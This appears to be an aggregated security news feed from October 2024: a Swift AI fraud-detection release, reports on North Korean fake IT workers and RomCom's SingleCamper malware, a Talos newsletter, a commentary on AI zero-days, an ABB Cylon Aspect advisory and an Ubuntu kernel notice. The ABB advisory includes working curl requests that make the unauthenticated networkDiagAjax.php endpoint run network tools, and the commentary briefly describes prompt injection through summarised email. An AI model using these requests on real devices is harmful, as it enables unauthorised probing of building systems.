PRESS RELEASE

Brussels, 16 October 2024 – Swift today announced that it is rolling out new AI-enhanced fraud detection to help the global payments industry step up its defence as bad actors grow increasingly sophisticated. Available from January 2025, the service is the result of extensive collaboration with banks from around the world and a successful pilot earlier this year.   

The new capability builds on Swift’s existing Payment Controls Service — used by many small and medium-sized financial institutions — by drawing on pseudonymised data from the billions of transactions that flow over the Swift network each year to identify and flag suspicious transactions so that action can be taken in real-time. 

The rollout is part of Swift’s broader collaboration with its global community of more than 11,500 banks and financial institutions to test how AI can solve cross-industry challenges. With global industry estimates putting the total cost of fraud in financial services at USD 485 billion in 2023 alone , Swift is focused on using AI to give financial institutions stronger and more accurate insights into instances of potentially fraudulent activity.

Jerome Piens, Chief Product Officer at Swift, said: “Bad actors are using increasingly sophisticated tactics to commit financial crime, and the global financial industry needs to raise its defences higher to ensure their customers can continue to transact globally with confidence. Swift has a long track record of supporting our community by staying one step ahead to maintain the security and resilience that our network is known for - and now we’re doing so again by harnessing the latest technology.”

Since February, Swift has been working with leading global financial institutions to explore how federated learning, combined with privacy-enhancing technologies, could enable market participants to share information without revealing their proprietary data. The group has so far developed a number of fraud detection use cases which are set to be tested in a sandbox environment. 

The rollout of this enhanced service is a key milestone in Swift’s strategic vision to make end to end international transactions instant and frictionless, while maintaining trust, security and compliance.

"Collaboration across the banking sector is crucial to enhancing fraud detection, and by sharing data and leveraging AI, we empower ourselves to stay ahead. At BNP Paribas, we are fully committed to supporting Swift’s innovative initiative in that regard, as it marks a key step forward in protecting the integrity of our financial ecosystem." 

Olivier Nautet, Head of Cybersecurity, BNP Paribas; Nicolas Trimbour, Head of Fraud Prevention, Cash Management, BNP Paribas, and Su Yang, Head of Artificial Intelligence, Transaction Banking, BNP Paribas

“Standard Bank Group, Africa’s biggest bank by assets, has participated in Swift’s initiative for AI fraud detection capability to enhance the security of its customers’ transactions. The technology will identify suspicious patterns in real-time, reducing fraud-risk and ensuring a safer banking experience for clients. By leveraging the power of AI, Standard Bank Group reaffirms its commitment to innovation and safeguarding the financial assets of its clients - who are our main asset.”  

John McHugh, Head Operations Control – CIB at Standard Bank

Swift to Launch AI-Powered Fraud Defence to Enhance Cross-Border Payments

North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom.…

North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom. Learn how to identify these deceptive tactics and protect your organization from this growing threat. Secureworks reveals the latest strategies employed by the North Korean threat group NICKEL TAPESTRY.

A recent report by cybersecurity firm Secureworks has exposed a disturbing but not-so-new tactic employed by North Korean hackers. They are infiltrating Western companies by posing as legitimate IT workers, stealing sensitive data, and then demanding ransom for its return. 

The mastermind behind this scheme is a North Korean hacking group known as Nickel Tapestry. The group operates from “laptop farms,” using stolen or falsified identities to fool HR departments at companies across the US, UK, and Australia. Often applying for developer positions, they utilize a variety of tactics to evade and conceal their identities/locations.

For instance, they request changes to delivery addresses for corporate laptops, often rerouting them to laptop farms, and sometimes they express a strong preference for using personal laptops and virtual desktop infrastructure (VDI) setups, a tactic previously warned by the FBI. This allows them to remotely access company networks without leaving a trace.

Also, they often exhibit “suspicious financial behaviours” such as frequent changes to bank account information or utilizing digital payment services to bypass traditional banking systems.

Additionally, the group uses residential proxy addresses and VPNs to mask their actual IP addresses. They also use “Splitcam” software during video calls to simulate video calls, avoiding the need to enable their webcams by creating fake AI clones of themselves. 

In one case, a fake worker gained access to a company’s network, exfiltrated sensitive data, and then – after being fired for poor performance – demanded a six-figure ransom for its return. This extortion element significantly increases the potential financial damage caused by these attacks. 

“The emergence of ransom demands marks a notable departure from prior NICKEL TAPESTRY schemes. However, the activity observed prior to the extortion aligns with previous schemes involving North Korean workers,” Secureworks’ Counter Threat Unit research team wrote in the report.

Perhaps most disturbing is the evidence of collaboration between these fake workers. They may provide fake references for each other, perform job duties on each other’s behalf, and even communicate via email while masquerading as different individuals. In one instance, researchers believe a single individual may have adopted multiple personas to further the scam.

Scam chain (Via SecureWorks)

****You’ve Been Warned!****

This IT worker scam isn’t new. Similar tactics have been observed since 2018, with fraudulent workers securing positions at Fortune 100 companies and funnelling stolen intellectual property back to North Korea to potentially fund weapons programs, including weapons of mass destruction.

In May 2022, the US government warned organizations to beware of North Korean hackers in the guise of IT freelancers claiming to be non-DPRK (Democratic People’s Republic of Korea) nationals.

In July 2024, North Korean hackers attempted another fake hiring scheme, this time targeting KnowBe4, a prominent U.S.-based cybersecurity company. In this case, a hacker posed as an IT worker and managed to secure employment with the company. The next step in the attack involved installing malware on a company-issued MacBook, intending to compromise KnowBe4’s systems.

****Protection Measures****

How can companies protect themselves from this evolving threat? Secureworks recommends thorough background checks and verification of candidate identities. Researchers suggest that a candidate’s work traits, such as applying for a full stack developer position, claiming 8-10 years of experience, and having novice to intermediate English skills, are the biggest red flags.

Additionally, unusual communication hours, varying communication styles, excuses for not enabling cameras during interviews, and a call center-like tone should trigger further investigation.

1.  **Feds Bust N. Korean Identity Theft Ring Targeting US Firms**
2.  **Hackers used fake job website to scam jobless US veterans**
3.  **Fake LinkedIn job offers scam spreading More\_eggs backdoor**
4.  **Fake GitHub Repos Caught Dropping Malware as PoCs AGAIN!**
5.  **Employee Duped by AI-Generated CFO in $25.6M Deepfake Scam**
6.  **Fake PoC Script Tricked Researchers into Downloading VenomRAT**

Fake North Korean IT Workers Infiltrate Western Firms, Demand Ransom

Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor.

Thursday, October 17, 2024 14:00

When I first interviewed with Joel Esler for my position at Cisco Talos, I remember when the time came for me to ask questions, one thing stood out. I asked what resources were available to me to learn about cybersecurity, because I was totally new to the space.  

His answer: The people. When I asked that question, Joel told me that the entire office was a library for me. He told me to just ask as many questions as I could. 

Coming from journalism, where I was reporting on a range of topics from local government, finance and banking, art and culture, and sports, cybersecurity was totally new to me. Now almost seven years later, I’ve been able to host a podcast that went nearly 200 episodes, relaunch a cybersecurity newsletter, researched malicious Facebook groups trading stolen personal information, and I’ve even learned how to write a ClamAV signature. 

Unfortunately, this week is my last at Talos, but far from my last in cybersecurity. I’m off to a new adventure, but I wanted to take the space here to talk about what I’ve learned in my career at Talos.  

I think that this is a good lesson for anyone reading this: If you want to work in cybersecurity, you can, no matter what your background or education is. I’ve met colleagues across Talos who previously studied counterterrorism operations, German and Russian history, and political science. And I walked into my first day on the job knowing next to nothing about cybersecurity. I knew I could write, and I knew I could help Talos tell their story (and clean up the occasional passive voice in their blog posts). But I had never heard of a remote access trojan before.  

I hope these lessons resonate with you, your team, or the next person you think about hiring into the cybersecurity industry.  

1.  **You can’t do any of this without people.** This has become extraordinarily relevant this year with the advent of AI. I personally have beef with the term “AI” anyway because we’ve been using machine learning in cybersecurity for years now, which is essentially what we’re using the “AI” buzzword to mean now. But at the end of the day, people are what makes cybersecurity detection work in the first place. If you don’t have a team that’s ready to put in the work necessary to write, test and improve the intelligence that goes into security products (AI or not), you’re doomed. Any of these tools are only as good as the people who put the information into them. I’ve been beyond impressed with the experience, work ethic, and knowledge that everyone in Talos has. They are what makes the engine run, and none of this would work without them. 
2.  **You can carve out your own niche in cybersecurity.** That said, you don’t have to know how to code to work in cybersecurity if you don’t want to. Anyone can carve out their own niche in the space with their own skillset. I still barely know how to write Python, but I’ve been able to use the skills that I do have (research, writing, storytelling, audio editing, etc.) to carve out my space in cybersecurity. I can speak intelligently about security problems and solutions with my colleagues without needing to know how to reverse-engineer a piece of malware. And even on the technical side of things, everyone can carve out their own specialty. Talos has experts on email spam, and even specific types of email spam, that their colleagues may not know anything about. Others specialize in certain geographic areas because they can speak the language there and can peel back an additional layer that non-native speakers can’t.  
3.  **Be a sponge.** Going back to the opening of this week’s newsletter, I needed to ask hundreds of questions in my first few months at Talos. It took me a good amount of time to get over my fear of looking stupid, and that held me back early on from having more intelligent conversations with my teammates because I would keep questions inside or just assume that Google had the right answers. No matter how many years you’ve been in the security space, there is always something new to learn. Never assume you know everything there is to know on a given topic. If you are a sponge for information, you never know what new skills you can pick up along the way. When I graduated from college with a journalism degree, I never would have believed you if you told me at the time that I’d be needing to understand how atomic clocks keep power grids running. But here we are. 

The Threat Source newsletter will be off for a few weeks while it undergoes a revamp, and it’ll be back with a new look.  

I want to thank everyone who has enabled me to grow and shape this newsletter over the years, growing it to thousands of subscribers. And, of course, thanks to the readers who have engaged, read and shared over the years.  

**The one big thing **

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian-speaking group we track as “UAT-5647” against Ukrainian government entities and unknown Polish entities. The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper.” This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader. 

**Why do I care? **

UAT-5647 has long been considered a multi-motivational threat actor performing ransomware and espionage-oriented attacks. However, in recent months, it has accelerated its attacks with a clear focus on establishing long–term access for exfiltrating data of strategic interest to it. UAT-5647 has also evolved its tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw, a RUST-based backdoor we call DustyHammock, and a C++-based backdoor we call ShadyHammock. 

**So now what? **

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against the several malware families that UAT-5647 uses.  

**Top security headlines of the week **

**Government and security officials are still unraveling what to make of recent revelations around multiple Chinese-state-sponsored actors infiltrating U.S. networks.** Most recently, Salt Typhoon was unveiled as a new actor that may have accessed foreign intelligence surveillance systems and electronic communications that some ISPs collect. like Verizon and AT&T collect based on U.S. court orders. The actor reportedly accessed highly sensitive intelligence and law enforcement data. This followed on reports earlier this year of other Chinese state-sponsored actors Volt Typhoon and Flax Typhoon, which targeted U.S. government networks and systems on military bases. One source told the Wall Street Journal that the latest discovery of Salt Typhoon could be “potentially catastrophic.” The actor allegedly gained access to Verizon, AT&T and Lumen Technologies by exploiting systems those companies use to comply with the U.S. CALEA act, which essentially legalizes wiretapping when required by law enforcement. (Axios, Tech Crunch) 

**Chip maker Qualcomm says adversaries exploited a zero-day vulnerability in dozens of its chipsets used in popular Android devices.** While few details are currently available regarding the vulnerability, CVE-2024-43047, researchers at Google and Amnesty International say they are working with Qualcomm to remediate and responsibly disclose more information. Qualcomm listed 64 different chipsets as being affected by the vulnerability, including the company’s Snapdragon 8 mobile platform, which is used many Android phones, including some made by Motorola, Samsung and ZTE. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also added the issue to its Known Exploited Vulnerabilities catalog, indicating they can confirm it’s been actively exploited in the wild. Qualcomm said it issued a fix in September, and it is now on the device manufacturers to roll out patches to their customers for affected devices. (Android Police, Tech Crunch) 

**As many as 14,000 medical devices across the globe are online and vulnerable to a bevy of security vulnerabilities and exploits, according to a new study.** Security research firm Censys recently found the devices exposed, which “greatly raise the risk of unauthorized access and exploitation.” Forty-nine percent of the exposed devices are located in the U.S. America’s decentralized health care system is largely believed to affect the amount of vulnerable devices, because there is less coordinaton to isolate the devices or patch them when vulnerabilities are disclosed, unlike countries like the U.K., where the health care system is solely organized and managed by the government. The Censys study found that many of the networks belonging to smaller health care organizations used residential ISPs, making them inherently less secure. Others set up devices and connected them to the internet without changing the preconfigured credentials or leaving their connections unencrypted. Others had simply been misconfigured. Open DICOM and DICOM-enabled web interfaces that are intended to share and view medical images were responsible for 36 percent of the exposures, with 5,100 IPs hosting these systems. (CyberScoop, Censys) 

**Can’t get enough Talos? **

*   Attackers Delight: Why Does Healthcare See So Many Attacks? 
*   Ghidra data type archive for Windows driver functions 
*   Protecting major events: An incident response blueprint 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

_There is no new data to report this week. This section will be overhauled in the next edition of the Threat Source newsletter._

What I’ve learned in my first 7-ish years in cybersecurity

As the unique challenges of AI zero-days emerge, the approach to managing the accompanying risks needs to follow traditional security best practices but be adapted for AI.

Dan McInerney, Lead AI Threat Researcher, Protect AI

October 17, 2024

3 Min Read

Source: Blackboard via Alamy Stock Photo

COMMENTARY

With artificial intelligence (AI) and machine learning (ML) adoption evolving at a breakneck pace, security is often a secondary consideration, especially in the context of zero-day vulnerabilities. These vulnerabilities, which are previously unknown security flaws exploited before developers have had a chance to remediate them, pose significant risks in traditional software environments.  

However, as AI/ML technologies become increasingly integrated into business operations, a new question arises: What does a zero-day vulnerability look like in an AI/ML system, and how does it differ from traditional contexts?

**Understanding Zero-Day Vulnerabilities in AI**

The concept of an "AI zero-day" is still nascent, with the cybersecurity industry lacking a consensus on a precise definition. Traditionally, a zero-day vulnerability refers to a flaw that is exploited before it is known to the software maker. In the realm of AI, these vulnerabilities often resemble those in standard Web applications or APIs, since these are the interfaces through which most AI systems interact with users and data. 

However, AI systems add an additional layer of complexity and potential risk. AI-specific vulnerabilities could potentially include problems like prompt injection. For instance, if an AI system summarizes one's email, then an attacker can inject a prompt in an email before sending it, leading to the AI returning potentially harmful responses. Training data leakage is another example of a unique zero-day threat in AI systems. Using crafted inputs to the model, attackers may be able to extract samples from the training data, which could include sensitive information or intellectual property. These types of attacks exploit the unique nature of AI systems that learn from and respond to user-generated inputs in ways traditional software systems do not.

**The Current State of AI Security**

AI development often prioritizes speed and innovation over security, leading to an ecosystem where AI applications and their underlying infrastructures are built without robust security from the ground up. This is compounded by the fact that many AI engineers are not security experts. As a result, AI/ML tooling often lacks the rigorous security measures that are standard in other areas of software development. 

From research conducted by the Huntr AI/ML bug bounty community, it is apparent that vulnerabilities in AI/ML tooling are surprisingly common and can differ from those found in more traditional Web environments built with current security best practices.

**Challenges and Recommendations for Security Teams**

While the unique challenges of AI zero-days are emerging, the fundamental approach to managing these risks should follow traditional security best practices but be adapted to the AI context. Here are several key recommendations for security teams: 

*   Adopt MLSecOps: Integrating security practices throughout the ML life cycle (MLSecOps) can significantly reduce vulnerabilities. This includes practices like having an inventory of all machine learning libraries and models in a machine learning bill of materials (MLBOM), and continuous scanning of models and environments for vulnerabilities. 
    

*   Perform proactive security audits: Regular security audits and employing automated security tools to scan AI tools and infrastructure can help identify and mitigate potential vulnerabilities before they are exploited. 
    

**Looking Ahead**

As AI continues to advance, so too will the complexity associated with security threats and the ingenuity of attackers. Security teams must adapt to these changes by incorporating AI-specific considerations into their cybersecurity strategies. The conversation about AI zero-days is just beginning, and the security community must continue to develop and refine best practices in response to these evolving threats. 

**About the Author**

Lead AI Threat Researcher, Protect AI

Dan McInerney is Lead AI Threat Researcher at Protect AI. He has 15 years of experience in red-team security, written dozens of security tools, and is a top-ranked Python GitHub developer. As a senior penetration tester, Dan has focused on novel attacks in emerging fields such as 3D printing and machine learning, and is credited with seven CVEs in AI tools. He teaches penetration testing and is a highly rated BlackHat instructor.

4 Ways to Address Zero-Days in AI/ML Security

The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023.
The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the activity cluster under the moniker UAT-5647.
"This

Threat Intelligence / Malware

The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023.

The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the activity cluster under the moniker UAT-5647.

"This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader," security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura noted.

RomCom, also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has engaged in multi-motivational operations such as ransomware, extortion, and targeted credential gathering since its emergence in 2022.

It's been assessed that the operational tempo of their attacks has increased in recent months with an aim to set up long-term persistence on compromised networks and exfiltrate data, suggesting a clear espionage agenda.

To that end, the threat actor is said to be "aggressively expanding their tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms" such as C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).

The attack chains start with a spear-phishing message that delivers a downloader -- either coded in C++ (MeltingClaw) or Rust (RustyClaw) -- which serves to deploy the ShadyHammock and DustyHammock backdoors, respectively. In parallel, a decoy document is displayed to the recipient to maintain the ruse.

While DustyHammock is engineered to contact a command-and-control (C2) server, run arbitrary commands, and download files from the server, ShadyHammock acts as a launchpad for SingleCamper as well as listening for incoming commands.

Despite's ShadyHammock additional features, it's believed that it's a predecessor to DustyHammock, given the fact that the latter was observed in attacks as recently as September 2024.

SingleCamper, the latest version of RomCom RAT, is responsible for a wide range of post-compromise activities, which entail downloading the PuTTY's Plink tool to establish remote tunnels with adversary-controlled infrastructure, network reconnaissance, lateral movement, user and system discovery, and data exfiltration.

"This specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647's two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise," the researchers said.

"It is also likely that Polish entities were also targeted, based on the keyboard language checks performed by the malware."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian RomCom Attacks Target Ukrainian Government with New SingleCamper RAT Variant

ABB Cylon Aspect version 3.08.01 allows an unauthenticated attacker to perform network operations such as ping, traceroute, or nslookup on arbitrary hosts or IPs by sending a crafted GET request to networkDiagAjax.php. This could be exploited to interact with or probe internal or external systems, leading to internal information disclosure and misuse of network resources.

    ABB Cylon Aspect 3.08.01 (networkDiagAjax.php) Remote Network Utility ExecutionVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The vulnerability allows an unauthenticated attacker to perform networkoperations such as ping, traceroute, or nslookup on arbitrary hosts or IPs bysending a crafted GET request to networkDiagAjax.php. This could be exploitedto interact with or probe internal or external systems, leading to internalinformation disclosure and misuse of network resources.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5844Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5844.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl "http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=packetstormsecurity.org"<div>Server:    8.8.8.8<br>Address 1: 8.8.8.8 dns.google<br><br>Name:      packetstormsecurity.org<br>Address 1: 198.84.60.198 198-84-60-198.ash01.rokabear.com<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=ping&host=1.1.1.1"<div>PING 1.1.1.1 (1.1.1.1): 56 data bytes<br>64 bytes from 1.1.1.1: seq=0 ttl=53 time=61.176 ms<br>64 bytes from 1.1.1.1: seq=1 ttl=53 time=60.986 ms<br>64 bytes from 1.1.1.1: seq=2 ttl=53 time=100.660 ms<br><br>--- 1.1.1.1 ping statistics ---<br>3 packets transmitted, 3 packets received, 0% packet loss<br>round-trip min/avg/max = 60.986/74.274/100.660 ms<br></div>$ curl "http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=127.0.0.1"<div>traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 38 byte packets<br> 1  localhost.localdomain (127.0.0.1)  0.019 ms  0.010 ms  0.009 ms<br></div>

ABB Cylon Aspect 3.08.01 networkDiagAjax.php Remote Network Utility Execution

Ubuntu Security Notice 7072-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7072-1October 16, 2024linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15,linux-raspi, linux-xilinx-zynqmp vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-nvidia: Linux kernel for NVIDIA systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-38630, CVE-2024-27397, CVE-2024-45016)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1037-xilinx-zynqmp  5.15.0-1037.41  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61  linux-image-5.15.0-1064-ibm     5.15.0-1064.67  linux-image-5.15.0-1064-raspi   5.15.0-1064.67  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72  linux-image-5.15.0-1066-nvidia  5.15.0-1066.67  linux-image-5.15.0-1066-nvidia-lowlatency  5.15.0-1066.67  linux-image-5.15.0-1068-kvm     5.15.0-1068.73  linux-image-5.15.0-1069-oracle  5.15.0-1069.75  linux-image-5.15.0-1070-gcp     5.15.0-1070.78  linux-image-5.15.0-1071-aws     5.15.0-1071.77  linux-image-5.15.0-124-generic  5.15.0-124.134  linux-image-5.15.0-124-generic-64k  5.15.0-124.134  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134  linux-image-5.15.0-124-lowlatency  5.15.0-124.134  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134  linux-image-aws-lts-22.04       5.15.0.1071.71  linux-image-gcp-lts-22.04       5.15.0.1070.66  linux-image-generic             5.15.0.124.124  linux-image-generic-64k         5.15.0.124.124  linux-image-generic-lpae        5.15.0.124.124  linux-image-gkeop               5.15.0.1054.53  linux-image-gkeop-5.15          5.15.0.1054.53  linux-image-ibm                 5.15.0.1064.60  linux-image-intel-iotg          5.15.0.1066.66  linux-image-kvm                 5.15.0.1068.64  linux-image-lowlatency          5.15.0.124.112  linux-image-lowlatency-64k      5.15.0.124.112  linux-image-nvidia              5.15.0.1066.66  linux-image-nvidia-lowlatency   5.15.0.1066.66  linux-image-oracle-lts-22.04    5.15.0.1069.65  linux-image-raspi               5.15.0.1064.62  linux-image-raspi-nolpae        5.15.0.1064.62  linux-image-virtual             5.15.0.124.124  linux-image-xilinx-zynqmp       5.15.0.1037.41Ubuntu 20.04 LTS  linux-image-5.15.0-1054-gkeop   5.15.0-1054.61~20.04.1  linux-image-5.15.0-1064-ibm     5.15.0-1064.67~20.04.1  linux-image-5.15.0-1066-intel-iotg  5.15.0-1066.72~20.04.1  linux-image-5.15.0-1069-oracle  5.15.0-1069.75~20.04.1  linux-image-5.15.0-1070-gcp     5.15.0-1070.78~20.04.1  linux-image-5.15.0-1071-aws     5.15.0-1071.77~20.04.1  linux-image-5.15.0-124-generic  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-64k  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-generic-lpae  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency  5.15.0-124.134~20.04.1  linux-image-5.15.0-124-lowlatency-64k  5.15.0-124.134~20.04.1  linux-image-aws                 5.15.0.1071.77~20.04.1  linux-image-gcp                 5.15.0.1070.78~20.04.1  linux-image-generic-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-generic-hwe-20.04   5.15.0.124.134~20.04.1  linux-image-generic-lpae-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-gkeop-5.15          5.15.0.1054.61~20.04.1  linux-image-ibm                 5.15.0.1064.67~20.04.1  linux-image-intel               5.15.0.1066.72~20.04.1  linux-image-intel-iotg          5.15.0.1066.72~20.04.1  linux-image-lowlatency-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-lowlatency-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-oem-20.04           5.15.0.124.134~20.04.1  linux-image-oem-20.04b          5.15.0.124.134~20.04.1  linux-image-oem-20.04c          5.15.0.124.134~20.04.1  linux-image-oem-20.04d          5.15.0.124.134~20.04.1  linux-image-oracle              5.15.0.1069.75~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.124.134~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7072-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1071.77  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1070.78  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1054.61  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1066.72  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1068.73  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1066.67  